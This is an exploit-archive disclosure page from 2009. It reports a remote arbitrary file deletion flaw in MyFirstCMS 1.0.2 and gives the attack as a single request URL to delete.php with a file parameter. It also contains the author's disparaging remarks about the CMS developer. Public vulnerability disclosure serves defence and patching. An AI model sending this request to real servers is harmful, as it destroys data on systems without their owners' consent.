[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
# Published : 2009-05-26
# Author : darkjoker
# Previous Title : Cute Editor ASP.NET Remote File Disclosure Vulnerability
# Next Title : Mole Adult Portal Script (profile.php user_id) SQL Injection Vulnerability


--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Site     : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

# www.Syue.com [2009-05-26]